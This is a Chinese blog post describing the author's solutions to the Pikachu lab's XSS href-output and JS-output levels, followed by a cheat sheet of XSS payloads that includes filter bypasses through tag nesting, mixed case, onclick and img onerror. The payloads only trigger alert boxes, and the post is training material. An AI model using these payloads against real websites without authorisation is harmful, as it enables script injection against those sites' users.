pikachuxss之herf、js输出

已于 2022-09-14 20:38:41 修改
阅读量1.1k 收藏 2
点赞数
分类专栏: pikachu学习 文章标签: javascript 前端 web安全
于 2022-09-14 20:11:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Resets_/article/details/126859419
版权

pikachu

xss之herf

F12打开开发者模式发现输入的内容就成为了herf的超链接内容1
输入javascript:alert(1)得到:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-jGtATGd9-1663157418135)(https://gitee.com/re_sets/images/raw/master/blog/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202022-09-14%20192605.png)]

xss之js输出

F12发现输入的内容都放入了js代码当中:image-20220914195251655

那就构造一个</script>让其提前结尾,输入</script><script>alert(2222)</script>显示:image-20220914195414900

xss总结

也就是payload总结,结合F12给的代码,目前学习到了:
<script>alert("XSS")</script> 基本xss
<a href="javascript:alert(1)">XSS Test</a> herf超链接xss
<scr<script>ipt>alert("XSS")</scr<script>ipt> 单一过滤标签xss
<Script>alert("XSS")</sCrIpt> 过滤小写script标签xss
<div οnclick="alert('xss')"> div onclick按钮标签xss
<img src=1 οnerrοr=alert("xss");> img图像xss
</script><script>alert(2222)</script> 提前结束<script>的xss

Resets_
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
皮卡丘(pikachu)靶场XSS漏洞练习
criminal_1的博客
02-06 482
皮卡丘(pikachu)靶场XSS漏洞练习
Pikachu靶场:XSS之htmlspecialchars、href输出以及js输出
witwitwiter的博客
04-17 1693
Pikachu靶场:XSS之htmlspecialchars、href输出以及js输出 实验环境以及工具 Firefox浏览器、Burp Suite、Pikachu靶场 实验原理 htmlspecialchars()函数把预定义的字符转换为HTML 实体。 预定义的字符是: &(和号)成为&amp ”(双引号)成为&quot '(单引号)成为&#039 ‘’< ‘’(小于)成为&lt ‘’> ‘’(大于)成为 &gt 可用的引号类型︰ ENT_CO
xssjs输出
apple12_12的博客
06-06 687
xssjs输出 当用户的输入被输出在了js中,该怎么绕过呢?今天在搞pikachu的时候遇到了这个问题,还是直接闭合标签< script >标签,再插入自己的代码:
皮卡丘xss之htmlspecialchars、xss之href输出xssjs输出
Fly_Mojito的博客
05-30 1077
皮卡丘xss之htmlspecialchars、xss之href输出xssjs输出
pikachu--xss
qq_43660551的博客
04-11 376
alert(document.cookie),f12未发现有用信息,右键看下网页源码,发现被过滤了。两个框输入1
pikachu xss系列漏洞实战之盲打、过滤、htmlspecialchars、herf输出js输出
永不垂头的博客
08-08 518
pikachu xss系列漏洞实战之盲打、过滤、htmlspecialchars、herf输出js输出 pikachu xss系列漏洞实战 首先搭建一下后台,需要连接数据库数据库 xss盲打 前端数据交互的地方,输入信息,输入后的结果不在前端显示,也就是 只有后台能看到输入的内容,从前端无法判断是否存在XSS,这种情况下,我们直接往里面插入XSS代码,然后等待 输入信息后: 输入 <script>alert(‘gxy’)</script> 222 登录后台查看
pikachu靶场第十四关——XSS(跨站脚本)之js输出(附代码审计)
最新发布
yzasts的博客
03-25 373
单引号没有被过滤,那么我们只需要将其闭合就行了。
Pikachu xssjs输出
SS_liang的博客
01-09 451
标签里面,就像我们平时的payload:<script>alert(xss)
pikachu xss合集(下)
小城的博客
12-17 1256
大家好,我是小城,一个刚刚起步的学渣,笨鸟先飞,可惜我领悟得太晚。但从现在开始,我会努力加油进取变强!
PiKachuXSS(跨站脚本)
angry_program的博客
02-19 3532
XSS概述 Cross-Site Scripting 简称为“CSS”,为避免与前端叠成样式表的缩写"CSS"冲突,故又称XSS。一般XSS可以分为如下几种常见类型: 1.反射性XSS; 2.存储型XSS; 3.DOM型XSS; XSS漏洞一直被评估为web漏洞中危害较大的漏洞,在OWASP TOP10的排名中一直属于前三的江湖地位。 XSS是一种发生在前端浏览器端的漏洞,所以其危害的...
pikachu练习——XSS
haoaaao的博客
01-22 982
/**** XSS是一种发生在前端浏览器端的漏洞,所以其危害的对象也是前端用户。 形成XSS漏洞的主要原因是程序对输入和输出没有做合适的处理,导致“精心构造”的字符输出前端时被浏览器当作有效代码解析执行从而产生危害。 因此在XSS漏洞的防范上,一般会采用“对输入进行过滤”和“输出进行转义”的方式进行处理: 输入过滤:对输入进行过滤,不允许可能导致XSS攻击的字符输入; 输出转义:根据输出点的位置对输出前端的内容进行适当转义; 一般XSS可以分为如下几种常见类型: 1.反射性XSS; ...
渗透测试-xss安全防御之href输出js输出
lza20001103的博客
04-24 2894
xss安全防御之href输出js输出
xss之盲打、过滤、htmlspecialchars、herf输出js输出
weixin_51446936的博客
06-02 1754
一、XSS之盲打 1.盲打概述 “xss盲打”是指在攻击者对数据提交后展现的后台未知的情况下,网站采用了攻击者插入了带真实攻击功能的xss攻击代码(通常是使用script标签引入远程的js)的数据。当未知后台在展现时没有对这些提交的数据进行过滤,那么后台管理人员在操作时就会触发xss来实现攻击者预定好的“真实攻击功能”。 也就是只有从后台才能看到前端输入的内容,从前端无法判断是否存在xss 2.实验演示 第一步:打开pikachuxss盲打,随便输入信息 第二步:模拟后台管理员,登录后台进行查看(右上角
XSS防范措施及href和js输出点的案例演示
weixin_43534549的博客
05-01 403
直接查看源码 如果你输入的是"www.baidu.com",它会提示你:我靠,我真想不到你是这样的一个人,如果你输入的不是百度,它会把你输出的内容用htmlspecialchars去进行处理,同时这里用了"ENT_QUOTES",这就意味着单引号、双引号、左右尖括号及&等特殊符号会被处理,然后会把它输出在a标签的href属性里,那这样是不是就没有问题呢? 我们可以看到:输出在a标签的h...
xss防范措施href 和js输出点的案例演示
qq_42764906的博客
04-27 818
后端代码 在 xss之href输出 中 输入 javascript:alert(111) 右键 查看源代码 ctrl+f 搜索alert
第八周作业 1.XSS盲打 2.XSS绕过 3.XSS绕过之htmlspecialchars()函数 4.XSS防范措施href和js输出
weixin_43899561的博客
05-04 635
1.XSS盲打 XSS盲打就是攻击者在不知道后台是否存在xss漏洞的情况下,提交恶意JS代码在类似留言板等输入框后,所展现的后台位置的情况下,网站采用了攻击者插入的恶意代码,当后台管理员在操作时就会出发插入的恶意代码,从而达到攻击者的目的。 在pikachu平台进行演示 先在xss盲打栏目下,输入payload,观察到可注入点。 现在以管理员的身份登入后台,就会出现弹窗,这就是一个简单的盲打...
xss防范措施及href和js输出点的案例演示
北冥有鱼
04-25 1154
XSS常见防范措施 总的原则:输入做过滤,输出做转义 我们直接来到pikachuxss案例中来看 现在我们能知道这个地方的后台是可以使用javascript来执行的 提交以后来看一下源码 我们能发现整个输入都在a标签的href里面,所以我们刚才的alert(111)能被执行 这个a标签的href在做防范时,仅仅依靠htmlspecialchars是不够的,我们在做这个地方的过滤,应该...
xss 笔记
LAngle9的博客
11-09 752
1,xss : 因为和css 冲突,改名字是xss,属于客户端攻击,网站管理员也是用户,攻击者盗取管理员的cookie,靠管理员身份作为“跳板”进行实施攻击。 XSS攻击最终目的是在网页中嵌入客户端恶意脚本代码,最常用的攻击代码是javascript语言,但也会使用其它的脚本语言 j avascript语言:是跨平台的,在jsp,php,asp,aspx,都可以使用 xss 用的脚本是可以构造的,有两千多种方法,要记者常用的函数就行 script, alert, img src 1.2 XSS漏洞
web-ctf】ctf-pikachu-XSS
一个努力生活的人的博客
06-27 2400
XSS-pikachu
pikachuxss
10-21
很抱歉,我无法回答关于“pikachuxss”的问题,因为在提供的引用中没有提到这个词汇。但是,根据提供的引用内容,可以了解到存储型XSS攻击是一种将恶意代码上传到服务器并在受害者访问网站时执行的攻击方式。攻击者通常会利用特殊符号过滤不严的漏洞来实现攻击。在输入恶意代码后,受害者在访问网站时可能会看到弹出窗口或者被重定向到其他网站。为了防止存储型XSS攻击,网站开发人员需要对用户输入的数据进行严格的过滤和验证。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值